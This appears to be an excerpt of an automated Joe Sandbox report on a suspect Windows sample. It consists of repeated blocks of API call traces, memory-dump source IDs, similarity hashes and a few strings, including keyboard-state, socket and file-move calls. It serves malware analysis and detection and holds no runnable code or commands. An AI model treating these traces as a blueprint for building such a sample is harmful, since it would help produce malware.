                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: Menu$Thread$Item$AttachCountCurrentInputMessagePostProcessSleepStringWindow_wcslen
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID: 4196846111-0
                                                                                                                                                                                                                                                                              • Opcode ID: 6a5da8a1d3718a58037b2c5122d58c535d98101d3adf14a0c6a9eed6198aa23d
                                                                                                                                                                                                                                                                              • Instruction ID: d9e9518542e19324139836ec8d37d40a31970a89f5eda847eeccce20482c6860
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6a5da8a1d3718a58037b2c5122d58c535d98101d3adf14a0c6a9eed6198aa23d
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 64718575A40215EFCB10EF64C845AAE7BF1EF48311F148459E815EB352D778ED42CBA0
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • GetParent.USER32(?), ref: 0075B8C0
                                                                                                                                                                                                                                                                              • GetKeyboardState.USER32(?), ref: 0075B8D5
                                                                                                                                                                                                                                                                              • SetKeyboardState.USER32(?), ref: 0075B936
                                                                                                                                                                                                                                                                              • PostMessageW.USER32(?,00000101,00000010,?), ref: 0075B964
                                                                                                                                                                                                                                                                              • PostMessageW.USER32(?,00000101,00000011,?), ref: 0075B983
                                                                                                                                                                                                                                                                              • PostMessageW.USER32(?,00000101,00000012,?), ref: 0075B9C4
                                                                                                                                                                                                                                                                              • PostMessageW.USER32(?,00000101,0000005B,?), ref: 0075B9E7
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: MessagePost$KeyboardState$Parent
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID: 87235514-0
                                                                                                                                                                                                                                                                              • Opcode ID: 8e23f1dd7cdcec0d4bee86468f2ac797aaace7d86990de75a56d4ef74e8f883e
                                                                                                                                                                                                                                                                              • Instruction ID: b6b28f5ef1910310e5ab96546455cb34d28775d7d5f4a084cabadf24e9576480
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8e23f1dd7cdcec0d4bee86468f2ac797aaace7d86990de75a56d4ef74e8f883e
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4151E1A0A087D57EFB3646348C5ABFABEA96F06305F088489E9D5458D2C3DCACCCD750
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • GetParent.USER32(00000000), ref: 0075B6E0
                                                                                                                                                                                                                                                                              • GetKeyboardState.USER32(?), ref: 0075B6F5
                                                                                                                                                                                                                                                                              • SetKeyboardState.USER32(?), ref: 0075B756
                                                                                                                                                                                                                                                                              • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 0075B782
                                                                                                                                                                                                                                                                              • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 0075B79F
                                                                                                                                                                                                                                                                              • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 0075B7DE
                                                                                                                                                                                                                                                                              • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 0075B7FF
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: MessagePost$KeyboardState$Parent
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID: 87235514-0
                                                                                                                                                                                                                                                                              • Opcode ID: 8075017784f9336f0cb2e605433cba5678a8eef0bd2a1749a317f82fbc7a6c87
                                                                                                                                                                                                                                                                              • Instruction ID: 2b2b077dcf35e9f2cf32344c7bc5d51991748c7189bbfcaf75e44f507c58b84c
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8075017784f9336f0cb2e605433cba5678a8eef0bd2a1749a317f82fbc7a6c87
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4E51E3A09047D53EFB3283648C55BF6BE999B45306F08888AE8D5468D2D3D8EC9CD790
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • GetConsoleCP.KERNEL32(FF8BC35D,00000000,?,?,?,?,?,?,?,00725F16,?,00000000,FF8BC35D,00000000,00000000,FF8BC369), ref: 007257E3
                                                                                                                                                                                                                                                                              • __fassign.LIBCMT ref: 0072585E
                                                                                                                                                                                                                                                                              • __fassign.LIBCMT ref: 00725879
                                                                                                                                                                                                                                                                              • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,FF8BC35D,00000005,00000000,00000000), ref: 0072589F
                                                                                                                                                                                                                                                                              • WriteFile.KERNEL32(?,FF8BC35D,00000000,00725F16,00000000,?,?,?,?,?,?,?,?,?,00725F16,?), ref: 007258BE
                                                                                                                                                                                                                                                                              • WriteFile.KERNEL32(?,?,00000001,00725F16,00000000,?,?,?,?,?,?,?,?,?,00725F16,?), ref: 007258F7
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID: 1324828854-0
                                                                                                                                                                                                                                                                              • Opcode ID: 38565b896c079573d16f8ee39b3cf915af366003ee4a7050e9aa60944649a7ac
                                                                                                                                                                                                                                                                              • Instruction ID: 90304f834a086702cee84df745b74c072fdddef672d5d08b3f42e305dbfff099
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 38565b896c079573d16f8ee39b3cf915af366003ee4a7050e9aa60944649a7ac
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A951C670A00659DFCB10CFA8E845AEEBBF8EF09310F14411AE951E7291E734AD41CF54
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • _ValidateLocalCookies.LIBCMT ref: 007130BB
                                                                                                                                                                                                                                                                              • ___except_validate_context_record.LIBVCRUNTIME ref: 007130C3
                                                                                                                                                                                                                                                                              • _ValidateLocalCookies.LIBCMT ref: 00713151
                                                                                                                                                                                                                                                                              • __IsNonwritableInCurrentImage.LIBCMT ref: 0071317C
                                                                                                                                                                                                                                                                              • _ValidateLocalCookies.LIBCMT ref: 007131D1
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Memory Dump Source
• Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
• Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                                                                                                                                                                              • String ID: csm
                                                                                                                                                                                                                                                                              • API String ID: 1170836740-1018135373
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                • Part of subcall function 0075E6F7: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,0075D7CD,?), ref: 0075E714
                                                                                                                                                                                                                                                                                • Part of subcall function 0075E6F7: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,0075D7CD,?), ref: 0075E72D
                                                                                                                                                                                                                                                                              • lstrcmpiW.KERNEL32(?,?), ref: 0075D7F0
                                                                                                                                                                                                                                                                              • MoveFileW.KERNEL32(?,?), ref: 0075D82A
                                                                                                                                                                                                                                                                              • _wcslen.LIBCMT ref: 0075D8B0
                                                                                                                                                                                                                                                                              • _wcslen.LIBCMT ref: 0075D8C6
                                                                                                                                                                                                                                                                              • SHFileOperationW.SHELL32(?), ref: 0075D90C
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: FileFullNamePath_wcslen$MoveOperationlstrcmpi
                                                                                                                                                                                                                                                                              • String ID: \*.*
                                                                                                                                                                                                                                                                              • API String ID: 3164238972-1173974218
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • GetInputState.USER32 ref: 00764310
                                                                                                                                                                                                                                                                              • TranslateAcceleratorW.USER32(?,00000000,?), ref: 00764367
                                                                                                                                                                                                                                                                              • TranslateMessage.USER32(?), ref: 00764390
                                                                                                                                                                                                                                                                              • DispatchMessageW.USER32(?), ref: 0076439A
                                                                                                                                                                                                                                                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 007643AB
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: Message$Translate$AcceleratorDispatchInputPeekState
                                                                                                                                                                                                                                                                              • String ID: (|
                                                                                                                                                                                                                                                                              • API String ID: 2256411358-3772712737
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 007838B8
                                                                                                                                                                                                                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 007838EB
                                                                                                                                                                                                                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 00783920
                                                                                                                                                                                                                                                                              • SendMessageW.USER32(?,000000F1,00000000,00000000), ref: 00783952
                                                                                                                                                                                                                                                                              • SendMessageW.USER32(?,000000F1,00000001,00000000), ref: 0078397C
                                                                                                                                                                                                                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 0078398D
                                                                                                                                                                                                                                                                              • SetWindowLongW.USER32(?,000000F0,00000000), ref: 007839A7
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: LongWindow$MessageSend
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID: 2178440468-0
APIs
• MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 007580D0
• MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 007580F6
• SysAllocString.OLEAUT32(00000000), ref: 007580F9
• SysAllocString.OLEAUT32(?), ref: 00758117
• SysFreeString.OLEAUT32(?), ref: 00758120
• StringFromGUID2.OLE32(?,?,00000028), ref: 00758145
• SysAllocString.OLEAUT32(?), ref: 00758153
Memory Dump Source
• Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
• Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
Similarity
• API ID: String$Alloc$ByteCharMultiWide$FreeFrom
• String ID:
• API String ID: 3761583154-0
APIs
• MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 007581A9
• MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 007581CF
• SysAllocString.OLEAUT32(00000000), ref: 007581D2
• SysAllocString.OLEAUT32 ref: 007581F3
• SysFreeString.OLEAUT32 ref: 007581FC
• StringFromGUID2.OLE32(?,?,00000028), ref: 00758216
• SysAllocString.OLEAUT32(?), ref: 00758224
Memory Dump Source
• Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
• Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
Similarity
• API ID: String$Alloc$ByteCharMultiWide$FreeFrom
• String ID:
• API String ID: 3761583154-0
APIs
• GetStdHandle.KERNEL32(0000000C), ref: 00760E99
• CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00760ED5
Strings
Memory Dump Source
• Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
• Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
Similarity
• API ID: CreateHandlePipe
• String ID: nul
• API String ID: 1424370930-2873401336
APIs
• GetStdHandle.KERNEL32(000000F6), ref: 00760F6D
• CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00760FA8
Strings
Memory Dump Source
• Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
• Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
Similarity
• API ID: CreateHandlePipe
• String ID: nul
• API String ID: 1424370930-2873401336
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                • Part of subcall function 006F7873: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 006F78B1
                                                                                                                                                                                                                                                                                • Part of subcall function 006F7873: GetStockObject.GDI32(00000011), ref: 006F78C5
                                                                                                                                                                                                                                                                                • Part of subcall function 006F7873: SendMessageW.USER32(00000000,00000030,00000000), ref: 006F78CF
                                                                                                                                                                                                                                                                              • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00784BB0
                                                                                                                                                                                                                                                                              • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 00784BBD
                                                                                                                                                                                                                                                                              • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00784BC8
                                                                                                                                                                                                                                                                              • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00784BD7
                                                                                                                                                                                                                                                                              • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00784BE3
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: MessageSend$CreateObjectStockWindow
                                                                                                                                                                                                                                                                              • String ID: Msctls_Progress32
                                                                                                                                                                                                                                                                              • API String ID: 1025951953-3636473452
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: _memcmp
                                                                                                                                                                                                                                                                              • String ID: j`u
                                                                                                                                                                                                                                                                              • API String ID: 2931989736-4287855088
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 0075E328
                                                                                                                                                                                                                                                                              • LoadStringW.USER32(00000000), ref: 0075E32F
                                                                                                                                                                                                                                                                              • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 0075E345
                                                                                                                                                                                                                                                                              • LoadStringW.USER32(00000000), ref: 0075E34C
                                                                                                                                                                                                                                                                              • MessageBoxW.USER32(00000000,?,?,00011010), ref: 0075E390
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              • %s (%d) : ==> %s: %s %s, xrefs: 0075E36D
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: HandleLoadModuleString$Message
                                                                                                                                                                                                                                                                              • String ID: %s (%d) : ==> %s: %s %s
                                                                                                                                                                                                                                                                              • API String ID: 4072794657-3128320259
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • InterlockedExchange.KERNEL32(?,?), ref: 00761322
                                                                                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(00000000,?), ref: 00761334
                                                                                                                                                                                                                                                                              • TerminateThread.KERNEL32(00000000,000001F6), ref: 00761342
                                                                                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00761350
                                                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 0076135F
                                                                                                                                                                                                                                                                              • InterlockedExchange.KERNEL32(?,000001F6), ref: 0076136F
                                                                                                                                                                                                                                                                              • LeaveCriticalSection.KERNEL32(00000000), ref: 00761376
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID: 3495660284-0
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • __WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 0077281D
                                                                                                                                                                                                                                                                              • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 0077283E
                                                                                                                                                                                                                                                                              • WSAGetLastError.WSOCK32 ref: 0077284F
                                                                                                                                                                                                                                                                              • htons.WSOCK32(?,?,?,?,?), ref: 00772938
                                                                                                                                                                                                                                                                              • inet_ntoa.WSOCK32(?), ref: 007728E9
                                                                                                                                                                                                                                                                                • Part of subcall function 0075433E: _strlen.LIBCMT ref: 00754348
                                                                                                                                                                                                                                                                                • Part of subcall function 00773C81: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,00000000,?,?,?,?,0076F669), ref: 00773C9D
                                                                                                                                                                                                                                                                              • _strlen.LIBCMT ref: 00772992
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: _strlen$ByteCharErrorLastMultiWidehtonsinet_ntoa
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID: 3203458085-0
                                                                                                                                                                                                                                                                              • Opcode ID: b9722ade16ebb641d80b5ae8a17e29ddb0c091ba561b43b8dcfdaa1c2ae60da6
                                                                                                                                                                                                                                                                              • Instruction ID: b04e540bf02a2ae5d0c17839947e3e3eafa45b7dfa63146fce13c4985b28043b
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b9722ade16ebb641d80b5ae8a17e29ddb0c091ba561b43b8dcfdaa1c2ae60da6
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C3B1FF31604300AFD724DF24C885E2ABBE5AF84358F94854CF56A4B2E3DB75ED86CB91
APIs
• __allrem.LIBCMT ref: 0072042A
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00720446
• __allrem.LIBCMT ref: 0072045D
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0072047B
• __allrem.LIBCMT ref: 00720492
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 007204B0
Memory Dump Source
• Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
• Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmp
